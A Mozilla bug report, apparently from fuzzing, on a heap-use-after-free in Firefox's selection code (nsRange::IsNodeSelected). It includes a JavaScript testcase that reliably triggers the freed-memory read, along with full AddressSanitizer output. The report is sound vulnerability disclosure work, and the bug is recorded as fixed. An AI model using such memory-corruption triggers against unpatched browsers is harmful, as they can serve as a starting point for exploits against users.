Closed Bug 1400179 Opened 8 years ago Closed 8 years ago

heap-use-after-free in nsRange::IsNodeSelected

Categories: Core :: DOM: Selection, defect
Version: 57 Branch
Type: defect
Priority: Not set
Severity: normal

Tracking: RESOLVED DUPLICATE of bug 1399091
Target Milestone: mozilla58

Tracking Status:
  thunderbird_esr52 --- unaffected
  firefox-esr52 --- unaffected
  firefox55 --- unaffected
  firefox56 --- unaffected
  firefox57 + fixed
  firefox58 --- fixed

People: Reporter: nils, Assigned: bzbarsky

References: Depends on 1 open bug

Details: 4 keywords, Whiteboard: [sec aspect a dupe of 1399091, assertion fixed in 1403145]

Attachments: 3 files
Attached file test.html
The following testcase crashes the latest ASAN build of Firefox (BuildID=20170914174242). It requires the attached test.html in the same directory and the fuzzPriv extension to reproduce reliably. It sometimes takes a few seconds to crash.

<script>
function start() {
  o0=open('test.html','popup52','height=31');
  o0.onload=fun0;
  o2=open('test.html','popup56','innerHeight=40');
  o2.onload=fun1;
  o23=document;
  setTimeout(fun3, 400);
}
function fun0(e) {
  o2=e.target;
  o11=o0.getSelection();
  o16=o2.documentElement;
  o18=o2.head;
  o20=document.createRange();
}
function fun3() {
  try{while(document.removeChild(document.firstChild));}catch(e){}
  o35=document.implementation.createHTMLDocument();
  document.appendChild(o35.documentElement);
  o36=document.createElement('style');
  o18.appendChild(o36);
  o20.selectNodeContents(o45);
  o36.after("a");
  o69=o2.getSelection();
  o69.addRange(o20);
  o20.setEndAfter(o36);
  document.documentElement.addEventListener('DOMSubtreeModified',fun2);
  o18.style.display='grid';
  o11.addRange(o20);
  o23.designMode='on';
  o11.selectAllChildren(o16);
  for(var x=0;x<50;x++) eval("o" + x + "=null");
  fuzzPriv.GC();fuzzPriv.CC();fuzzPriv.GC();fuzzPriv.CC();
}
function fun1(e) {
  o38=e.target;
  o45=o38.getElementsByTagName('*')[2];
}
function fun2(){
  o38.designMode='on';
}
</script>
<body onload="start()"></body>

ASAN output:

=================================================================
==23032==ERROR: AddressSanitizer: heap-use-after-free on address 0x61000006fe78 at pc 0x7f27cd25fd7a bp 0x7ffddb793cf0 sp 0x7ffddb793ce8
READ of size 1 at 0x61000006fe78 thread T0 (file:// Content)
    #0 0x7f27cd25fd79 in asT /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/LinkedList.h:319:12
    #1 0x7f27cd25fd79 in getNext /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/LinkedList.h:206
    #2 0x7f27cd25fd79 in getFirst /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/LinkedList.h:478
    #3 0x7f27cd25fd79 in begin /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/LinkedList.h:539
    #4 0x7f27cd25fd79 in nsRange::IsNodeSelected(nsINode*, unsigned int, unsigned int) /builds/worker/workspace/build/src/dom/base/nsRange.cpp:212
    #5 0x7f27d1462783 in nsIFrame::IsSelected() const /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:10467:5
    #6 0x7f27d16129d2 in nsTextFrame::UnionAdditionalOverflow(nsPresContext*, nsIFrame*, PropertyProvider&, nsRect*, bool) /builds/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:5979:8
    #7 0x7f27d163afd5 in nsTextFrame::ReflowText(nsLineLayout&, int, mozilla::gfx::DrawTarget*, mozilla::ReflowOutput&, nsReflowStatus&) /builds/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:9824:3
    #8 0x7f27d157063c in nsLineLayout::ReflowFrame(nsIFrame*, nsReflowStatus&, mozilla::ReflowOutput*, bool&) /builds/worker/workspace/build/src/layout/generic/nsLineLayout.cpp:924:7
    #9 0x7f27d13e0144 in nsBlockFrame::ReflowInlineFrame(mozilla::BlockReflowInput&, nsLineLayout&, nsLineList_iterator, nsIFrame*, LineReflowStatus*) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:4218:15
    #10 0x7f27d13ded58 in nsBlockFrame::DoReflowInlineFrames(mozilla::BlockReflowInput&, nsLineLayout&, nsLineList_iterator, nsFlowAreaRect&, int&, nsFloatManager::SavedState*, bool*, LineReflowStatus*, bool) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:4014:5
    #11 0x7f27d13d6819 in nsBlockFrame::ReflowInlineFrames(mozilla::BlockReflowInput&, nsLineList_iterator, bool*) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:3888:9
    #12 0x7f27d13d0418 in nsBlockFrame::ReflowLine(mozilla::BlockReflowInput&, nsLineList_iterator, bool*) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2871:5
    #13 0x7f27d13c5f1f in nsBlockFrame::ReflowDirtyLines(mozilla::BlockReflowInput&) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2407:7
    #14 0x7f27d13bccd2 in nsBlockFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:1233:3
    #15 0x7f27d1418e0a in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, mozilla::WritingMode const&, mozilla::LogicalPoint const&, nsSize const&, unsigned int, nsReflowStatus&, nsOverflowContinuationTracker*) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:932:14
    #16 0x7f27d1527705 in MeasuringReflow(nsIFrame*, mozilla::ReflowInput const*, gfxContext*, mozilla::LogicalSize const&, mozilla::LogicalSize const&, int, int) /builds/worker/workspace/build/src/layout/generic/nsGridContainerFrame.cpp:3501:11
    #17 0x7f27d152aa5e in ContentContribution(nsGridContainerFrame::GridItemInfo const&, nsGridContainerFrame::GridReflowInput const&, gfxContext*, mozilla::WritingMode, mozilla::LogicalAxis, mozilla::Maybe<mozilla::LogicalSize> const&, nsLayoutUtils::IntrinsicISizeType, int, unsigned int) /builds/worker/workspace/build/src/layout/generic/nsGridContainerFrame.cpp:3566:12
    #18 0x7f27d15263c4 in MinSize(nsGridContainerFrame::GridItemInfo const&, nsGridContainerFrame::GridReflowInput const&, gfxContext*, mozilla::WritingMode, mozilla::LogicalAxis, CachedIntrinsicSizes*) /builds/worker/workspace/build/src/layout/generic/nsGridContainerFrame.cpp:3706:23
    #19 0x7f27d1524558 in nsGridContainerFrame::Tracks::ResolveIntrinsicSizeStep1(nsGridContainerFrame::GridReflowInput&, nsGridContainerFrame::TrackSizingFunctions const&, int, SizingConstraint, nsGridContainerFrame::LineRange const&, nsGridContainerFrame::GridItemInfo const&) /builds/worker/workspace/build/src/layout/generic/nsGridContainerFrame.cpp:3800:11
    #20 0x7f27d151e82c in nsGridContainerFrame::Tracks::ResolveIntrinsicSize(nsGridContainerFrame::GridReflowInput&, nsTArray<nsGridContainerFrame::GridItemInfo>&, nsGridContainerFrame::TrackSizingFunctions const&, nsGridContainerFrame::LineRange nsGridContainerFrame::GridArea::*, int, SizingConstraint) /builds/worker/workspace/build/src/layout/generic/nsGridContainerFrame.cpp:4198:11
    #21 0x7f27d1510cc5 in nsGridContainerFrame::Tracks::CalculateSizes(nsGridContainerFrame::GridReflowInput&, nsTArray<nsGridContainerFrame::GridItemInfo>&, nsGridContainerFrame::TrackSizingFunctions const&, int, nsGridContainerFrame::LineRange nsGridContainerFrame::GridArea::*, SizingConstraint) /builds/worker/workspace/build/src/layout/generic/nsGridContainerFrame.cpp:3730:3
    #22 0x7f27d1510686 in nsGridContainerFrame::GridReflowInput::CalculateTrackSizes(nsGridContainerFrame::Grid const&, mozilla::LogicalSize&, SizingConstraint) /builds/worker/workspace/build/src/layout/generic/nsGridContainerFrame.cpp:2348:9
    #23 0x7f27d153691f in nsGridContainerFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /builds/worker/workspace/build/src/layout/generic/nsGridContainerFrame.cpp:5971:21
    #24 0x7f27d13dc0dd in nsBlockReflowContext::ReflowBlock(mozilla::LogicalRect const&, bool, nsCollapsingMargin&, int, bool, nsLineBox*, mozilla::ReflowInput&, nsReflowStatus&, mozilla::BlockReflowInput&) /builds/worker/workspace/build/src/layout/generic/nsBlockReflowContext.cpp:306:11
    #25 0x7f27d13d25f9 in nsBlockFrame::ReflowBlockFrame(mozilla::BlockReflowInput&, nsLineList_iterator, bool*) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:3519:11
    #26 0x7f27d13d0582 in nsBlockFrame::ReflowLine(mozilla::BlockReflowInput&, nsLineList_iterator, bool*) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2868:5
    #27 0x7f27d13c5f1f in nsBlockFrame::ReflowDirtyLines(mozilla::BlockReflowInput&) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2407:7
    #28 0x7f27d13bccd2 in nsBlockFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:1233:3
    #29 0x7f27d1418e0a in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, mozilla::WritingMode const&, mozilla::LogicalPoint const&, nsSize const&, unsigned int, nsReflowStatus&, nsOverflowContinuationTracker*) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:932:14
    #30 0x7f27d14176f6 in nsCanvasFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /builds/worker/workspace/build/src/layout/generic/nsCanvasFrame.cpp:753:5
    #31 0x7f27d1418e0a in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, mozilla::WritingMode const&, mozilla::LogicalPoint const&, nsSize const&, unsigned int, nsReflowStatus&, nsOverflowContinuationTracker*) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:932:14
    #32 0x7f27d14d69d8 in nsHTMLScrollFrame::ReflowScrolledFrame(mozilla::ScrollReflowInput*, bool, bool, mozilla::ReflowOutput*, bool) /builds/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:548:3
    #33 0x7f27d14d808e in nsHTMLScrollFrame::ReflowContents(mozilla::ScrollReflowInput*, mozilla::ReflowOutput const&) /builds/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:660:3
    #34 0x7f27d14db239 in nsHTMLScrollFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /builds/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:1036:3
    #35 0x7f27d13a3d23 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, int, int, unsigned int, nsReflowStatus&, nsOverflowContinuationTracker*) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:976:14
    #36 0x7f27d13a264a in mozilla::ViewportFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /builds/worker/workspace/build/src/layout/generic/ViewportFrame.cpp:332:7
    #37 0x7f27d11a4307 in mozilla::PresShell::DoReflow(nsIFrame*, bool) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:9405:11
    #38 0x7f27d11b82c1 in mozilla::PresShell::ProcessReflowCommands(bool) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:9578:24
    #39 0x7f27d11b7560 in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:4207:11
    #40 0x7f27d112e4c4 in FlushPendingNotifications /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:566:5
    #41 0x7f27d112e4c4 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1956
    #42 0x7f27d113c94b in TickDriver /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:337:13
    #43 0x7f27d113c94b in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:307
    #44 0x7f27d113c646 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:329:5
    #45 0x7f27d113eb9b in RunRefreshDrivers /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:770:5
    #46 0x7f27d113eb9b in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:683
    #47 0x7f27d113e7a6 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:584:9
    #48 0x7f27d1971df2 in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&) /builds/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:67:16
    #49 0x7f27cb7a7721 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:155:20
    #50 0x7f27cb3e97de in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:1716:28
    #51 0x7f27cb334b99 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2119:25
    #52 0x7f27cb331974 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2045:17
    #53 0x7f27cb333184 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1891:5
    #54 0x7f27cb3337d8 in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1924:15
    #55 0x7f27ca5932bd in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1039:14
    #56 0x7f27ca598ff8 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:521:10
    #57 0x7f27cb33c761 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #58 0x7f27cb29e7eb in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #59 0x7f27cb29e7eb in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #60 0x7f27cb29e7eb in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #61 0x7f27d0a4e99f in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:158:27
    #62 0x7f27d4d90827 in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:880:22
    #63 0x7f27cb29e7eb in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #64 0x7f27cb29e7eb in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #65 0x7f27cb29e7eb in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #66 0x7f27d4d901da in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:705:34
    #67 0x4ebe03 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:63:30
    #68 0x4ebe03 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:285
    #69 0x7f27e7ba382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #70 0x41d758 in _start (/fuzzer3/firefox/firefox+0x41d758)

0x61000006fe78 is located 56 bytes inside of 184-byte region [0x61000006fe40,0x61000006fef8)
freed by thread T0 (file:// Content) here:
    #0 0x4bbc8b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
    #1 0x7f27ca428fd7 in SnowWhiteKiller::~SnowWhiteKiller() /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2705:25
    #2 0x7f27ca43069b in FreeSnowWhite /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2893:3
    #3 0x7f27ca43069b in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3909
    #4 0x7f27ca42fbb3 in nsCycleCollector::Collect(ccType, js::SliceBudget&, nsICycleCollectorListener*, bool) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3730:9
    #5 0x7f27ca433a00 in nsCycleCollector_collect(nsICycleCollectorListener*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4299:21
    #6 0x7f27cd20bf8d in nsJSContext::CycleCollectNow(nsICycleCollectorListener*) /builds/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1480:3
    #7 0x7f27ccd4b46b in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*) /builds/worker/workspace/build/src/dom/base/nsDOMWindowUtils.cpp:1434:3
    #8 0x7f27ca5bc191 in NS_InvokeByIndex /builds/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_asm_x86_64_unix.S:129
    #9 0x7f27cbd76a50 in Invoke /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1996:12
    #10 0x7f27cbd76a50 in Call /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1315
    #11 0x7f27cbd76a50 in XPCWrappedNative::CallMethod(XPCCallContext&, XPCWrappedNative::CallMode) /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1282
    #12 0x7f27cbd7da1f in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:928:12
    #13 0x7f27d52758b4 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
    #14 0x7f27d52758b4 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495
    #15 0x7f27d525f44f in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:546:12
    #16 0x7f27d525f44f in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3084
    #17 0x7f27d52469db in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:435:12
    #18 0x7f27d5275a4c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:513:15
    #19 0x7f27d52763a2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:559:10
    #20 0x7f27d5cca8e3 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2906:12
    #21 0x7f27cbc94d3b in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:315:18
    #22 0x7f27d52758b4 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
    #23 0x7f27d52758b4 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495
    #24 0x7f27d54aa1ec in js::jit::DoCallFallback(JSContext*, js::jit::BaselineFrame*, js::jit::ICCall_Fallback*, unsigned int, JS::Value*, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jit/BaselineIC.cpp:2589:14
    #25 0x3ab1f7a93306 (<unknown module>)
    #26 0x62100091b067 (<unknown module>)
    #27 0x3ab1f7a878a9 (<unknown module>)
    #28 0x7f27d54d7782 in EnterBaseline(JSContext*, js::jit::EnterJitData&) /builds/worker/workspace/build/src/js/src/jit/BaselineJIT.cpp:160:9
    #29 0x7f27d54d88ec in js::jit::EnterBaselineAtBranch(JSContext*, js::InterpreterFrame*, unsigned char*) /builds/worker/workspace/build/src/js/src/jit/BaselineJIT.cpp:268:28
    #30 0x7f27d5268b32 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2040:28
    #31 0x7f27d52469db in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:435:12
    #32 0x7f27d5275a4c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:513:15
    #33 0x7f27d52763a2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:559:10
    #34 0x7f27d5ccc76b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2965:12
    #35 0x7f27ce7a8e09 in mozilla::dom::Function::Call(JSContext*, JS::Handle<JS::Value>, nsTArray<JS::Value> const&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/FunctionBinding.cpp:36:8

previously allocated by thread T0 (file:// Content) here:
    #0 0x4bbfdc in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x4ed4fd in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:84:17
    #2 0x7f27cd116e6d in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:206:12
    #3 0x7f27cd116e6d in nsIDocument::CreateRange(mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:7034
    #4 0x7f27ce69ba83 in mozilla::dom::DocumentBinding::createRange(JSContext*, JS::Handle<JSObject*>, nsIDocument*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/DocumentBinding.cpp:1500:45
    #5 0x7f27cec20020 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3055:13
    #6 0x7f27d52758b4 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
    #7 0x7f27d52758b4 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495
    #8 0x7f27d525f44f in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:546:12
    #9 0x7f27d525f44f in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3084
    #10 0x7f27d52469db in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:435:12
    #11 0x7f27d5275a4c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:513:15
    #12 0x7f27d52763a2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:559:10
    #13 0x7f27d5f7fe2e in js::ForwardingProxyHandler::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /builds/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:175:12
    #14 0x7f27d5f428d9 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /builds/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:359:23
    #15 0x7f27d5f5fe83 in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:497:21
    #16 0x7f27d5f62847 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:757:12
    #17 0x7f27d5275cfc in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
    #18 0x7f27d5275cfc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477
    #19 0x7f27d52763a2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:559:10
    #20 0x7f27d5ccc76b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2965:12
    #21 0x7f27ce654e05 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #22 0x7f27cf0269f5 in Call<nsISupports *> /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #23 0x7f27cf0269f5 in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
    #24 0x7f27cefeffc9 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1112:51
    #25 0x7f27ceff2090 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1283:20
    #26 0x7f27cefd1e81 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:462:16
    #27 0x7f27cefd5352 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:822:9
    #28 0x7f27d129855e in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1081:7
    #29 0x7f27d4242991 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7741:21
    #30 0x7f27d423e9b4 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7539:7
    #31 0x7f27d424635f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7436:13
    #32 0x7f27cbf5f4f0 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1320:3
    #33 0x7f27cbf5e5ac in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:861:14
    #34 0x7f27cbf5b566 in nsDocLoader::DocLoaderIsEmpty(bool) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:750:9

SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/LinkedList.h:319:12 in asT
Shadow bytes around the buggy address:
  0x0c2080005f70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2080005f80: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c2080005f90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2080005fa0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c2080005fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
